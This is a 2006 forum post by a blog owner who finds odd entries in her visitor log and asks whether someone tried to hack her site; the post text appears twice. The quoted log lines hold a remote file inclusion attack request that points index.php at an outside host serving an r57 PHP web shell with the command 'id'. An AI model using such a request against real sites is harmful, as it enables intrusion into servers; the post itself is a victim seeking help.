austriaka
12-17-2006, 12:33 AM
When looking through visitors table in database I found a lot of entries like that:
host: blog.uhlig.at
ua: libwww-perl/5.79
ip: 193.145.45.55
ruri: /index.php?x=http://ilmil.altervista.org/files/r57.txt?cmd=id?
When looking at http://ilmil.altervista.org/files/r57.txt?cmd=id? I found a very strange looking PHP script in russian? language.
Does anybody know what this could be? Did somebody try to hack my database?
If I call the link http://blog.uhlig.at/index.php?x=http://ilmil.altervista.org/files/r57.txt?cmd=id? I'm glad it gives an 404 HTTP error.
But I am a little bit scared anyway.
Please help!
KArin
host: blog.uhlig.at
ua: libwww-perl/5.79
ip: 193.145.45.55
ruri: /index.php?x=http://ilmil.altervista.org/files/r57.txt?cmd=id?
When looking at http://ilmil.altervista.org/files/r57.txt?cmd=id? I found a very strange looking PHP script in russian? language.
Does anybody know what this could be? Did somebody try to hack my database?
If I call the link http://blog.uhlig.at/index.php?x=http://ilmil.altervista.org/files/r57.txt?cmd=id? I'm glad it gives an 404 HTTP error.
But I am a little bit scared anyway.
Please help!
KArin